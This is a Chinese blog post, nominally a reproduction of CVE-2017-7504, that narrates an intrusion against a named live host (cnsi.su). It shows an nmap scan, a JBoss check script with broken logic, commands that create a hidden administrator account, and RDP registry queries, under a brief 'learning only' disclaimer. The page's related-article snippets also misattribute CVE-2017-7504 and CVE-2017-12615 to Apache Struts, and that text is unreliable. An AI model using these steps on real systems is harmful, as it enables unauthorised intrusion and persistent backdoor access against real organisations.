CVE-2017-7504漏洞复现

最新推荐文章于 2024-05-07 11:43:30 发布
最新推荐文章于 2024-05-07 11:43:30 发布
阅读量592 收藏
点赞数
文章标签: ruby 开发语言 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Foreverlove112/article/details/127130939
版权

【实战】入侵美国加州纳米技术研究院

目标介绍

前期信息收集

在这里插入图片描述


google hacking语法
cnsi ru
cnsi su

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

常见端口扫描

nmap -n --open -p  22,23,135,445,389,3389,80,443,8080,7001,3306,1433,1521,6379,27017,2375,5900,5432,4899 193.124.206.201

在这里插入图片描述

发现了8080端口
访问发现
在这里插入图片描述

入侵过程
发现是JBoss Application Server
那就直接扫一波CVE-2017-7504

from logging import fatal
from poctools import BasicPoc

class CVE_2017_7504(BasicPoc):

    path = "/jbossmq-httpil/HTTPServerILServlet"

    def __init__(self):
        super(CVE_2017_7504, self).__init__()
        self.name = "Jboss任意代码执行"

    def verify(self, url):
        response = self.get(url+self.path)
        if response is None:
            return False
        return (response.status_code == 200 and response.status_code == 500) or \
        ("JBoss" in response.headers.get("X-Powered-By Servlet 2.4", "") or
         "Apache-Coyote/1.1" in response.headers.get("Server", ""))

if __name__ == '__main__':
    target = "http://cnsi.su:8080/"
    poc = CVE_2017_7504()
    result = poc.run(target)
    print(f"{target} -> {result}")

创建后门

net user luze admiN@1234! /add
net localgroup administrators luze /add
#备注
由于目标系统是俄语,得加入的组得是俄文:администратор   Администраторы
net localgroup Администраторы luze /add

在这里插入图片描述

RDP开启

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections

在这里插入图片描述

查看RDP端口

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber

远程连接
在这里插入图片描述
本文中所有到的技术仅供学习交流使用,请勿使用非法用途

Doxi-13A
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2017-7269-Echo-PoC:CVE-2017-7269回显PoC,用于远程入侵检测。
03-02
CVE-2017-7269远程代码执行回显验证 我们团队对此次发布CVE-2017-7269漏洞的分析报告: ://ht-sec.org/cve-2017-7269-vulnerabilities/ DefaultPoC只能弹calc.exe ,现在修改成可以响应请求,命令格式为: CVE-2017-7269_remote_echo.py ip_address端口 效果如下:
CVE-2017-12615-master.zip
09-04
**CVE-2017-12615:Apache Struts2远程代码执行漏洞详解** CVE-2017-12615是一个针对Apache Struts2框架的严重安全漏洞,它允许攻击者通过恶意构造的HTTP请求在目标服务器上执行任意代码,从而可能导致数据泄露、...
JBoss漏洞 - CVE-2017-7504
HAKUNAMATATATTA的博客
12-14 2371
JBoss AS 4.x 及之前版本中, JbossMQ 实现过程的 JMS over HTTP Invocation Layer 的HTTPServerILServlet.java 文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。CVE-2017-7504 漏洞CVE-2015-7501 的漏洞原理相似,只是利用的路径稍微出现了变化, CVE-2017-7504 出现在 /jbossmq-httpil/HTTPServerILServlet 路径下。
vulhub之jboss(CVE-2017-7504)
最新发布
weixin_56306210的博客
05-07 439
vulhub之jboss(CVE-2017-7504)
中间件安全:JBoss 反序列化命令执行漏洞.(CVE-2017-7504
网络安全领域___专研者.
11-28 1569
JBoss 反序列化漏洞,该漏洞位于 JBoss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中,其 doFilter 方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致恶意访问者通过精心设计的序列化数据执行任意代码。
[Vulfocus解题系列] jboss 反序列化 (CVE-2017-7504
00勇士王子的博客
07-11 1057
漏洞介绍 名称: jboss 反序列化 (CVE-2017-7504) 描述: Red Hat JBoss Application Server(AS,也称WildFly)是美国红帽(Red Hat)公司的一款基于JavaEE的开源的应用服务器,它具有启动超快、轻量、模块化设计、热部署和并行部署、简洁管理、域管理及第一类元件等特性。 Jboss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件
【jboss漏洞复现CVE-2017-7504反序列化漏洞+CVE-2017-12149任意代码执行漏洞+JMXInvokerServlet-deserialization反序列化漏洞
serendipity1130的博客
08-31 941
CVE-2017-7504 Jboss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。 1.扫描开放了8080端口,访问8080端口: 2、利用工具选择一个Gadget:ExampleCommonsCollections1WithHashMap编译并生成序列化数据: javac -cp .:common
JBoss 中间件漏洞
qq_53742230的博客
07-11 1149
JBoss 中间件漏洞复现
浅谈Node.js CVE-2017-14849 漏洞分析(详细步骤)
10-19
【Node.js CVE-2017-14849 漏洞分析】 Node.js 是一个基于 Chrome V8 引擎的 JavaScript 运行时,它提供了高效的事件驱动、非阻塞 I/O 模型,使得开发高性能的网络应用变得简单。Express,则是建立在 Node.js 平台...
jboss-CVE-2017-12149
01-22
Jboss反序列化漏洞利用工具,CVE-2017-12149。Jboss反序列化漏洞利用工具,CVE-2017-12149。
JBOSS反序列化漏洞
weixin_52206305的博客
07-05 3895
Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。 经典的JBoss反序列化漏洞,JBoss在请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。访问http://ip+端口/invoker/JMXInvokerServlet 如果出现下载提示框,就证明可能存在漏洞。该漏洞出现在请求中访问http://ip+端口/如果出现该页面就表示可能存在漏洞漏洞出现在/invoker/rea
jboss漏洞复现
Shanfenglan's blog
11-23 998
文章目录什么是jboss1. JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149)原理利用2. JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504)原理利用参考文章 什么是jboss java中间件,类似于weblogic,webSphere等。可以理解成是一个加强版的可以实现EJB的tomcat。它的内部集成了tomcat对servlet处理的功能,而且支持EJB,不过weblogic的性能几乎全优于它,基本可以用weblogic代替。 1. JBos
漏洞复现 :JBoss漏洞总结
qq_45751902的博客
10-31 1446
如果部署成功,就可以打开包页面,假设刚才上传的包名为shell.war,所以要打开:8080/shell/,然后就会看到包里面的内容,如果里面有一个名为hack.jsp的木马,那么我们就可以打开:8080/shell/hack.jsp,然后连接即可。打开后找到addurl栏,这里有两个栏,一个是java.net.url,另一个是java.net.string,似乎不管是那个都可以。其实原理和上面的方法是一样的,就是生成一个序列化的数据然后发送报文,让其自动反序列化,只不过反弹的语句可控。
CVE-2017-7504 (JBOSS反序列化漏洞)漏洞复现
Jerry____的博客
12-16 1893
CVE-2017-7504 (JBOSS反序列化漏洞)漏洞复现 一:漏洞原理 JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。 二:影响范围 JBoss AS 4.x及之前版本。 三:环境搭建 cd...
jboss反序列化漏洞复现(CVE-2017-7504)
WY92139010的博客
07-31 567
jboss反序列化漏洞复现(CVE-2017-7504) 一、漏洞描述 Jboss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。 二、漏洞环境搭建以及复现 1、使用docker搭建漏洞环境...
中间件安全之JBoss
qq_46085232的博客
05-12 253
中间件安全JBoss特定漏洞JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149)JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504)JMXInvokerServlet 反序列化漏洞弱口令安全JBoos 4.X 弱口令管理后台部署war包getshellJBoos 5/6.X 弱口令管理后台部署war包getshell危害 JBoss JBoss 是一个基于 J2EE 的开发源代码的应用服务器。 JBoss 代码遵循 LGPL 许可,可以在任何商业应用中免
cve-2017-7504漏洞复现
08-23
您好!对于CVE-2017-7504漏洞复现,请注意以下几个步骤: 1. 确认受影响的软件版本:CVE-2017-7504是一个Apache Struts 2框架中的远程代码执行漏洞。在复现之前,请确保目标系统运行的是受影响的Apache Struts 2版本。 2. 搭建相应的环境:您可以在漏洞复现环境中使用Apache Struts 2漏洞测试框架,例如Metasploit或其他可用的漏洞测试工具。 3. 指定目标URL:使用合适的工具,指定目标URL以进行漏洞利用。通常,您需要提供目标系统上受影响的Struts 2应用程序的URL。 4. 发起攻击:使用漏洞利用工具执行相应的攻击代码。具体的攻击方法取决于您使用的工具和漏洞利用脚本。 请注意,漏洞复现属于未经授权的活动,可能违反法律法规,因此我们强烈建议仅在合法授权和合规测试范围内进行漏洞复现。此外,对于未经授权或非法目的使用该漏洞进行攻击是违法行为,且可能导致严重后果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值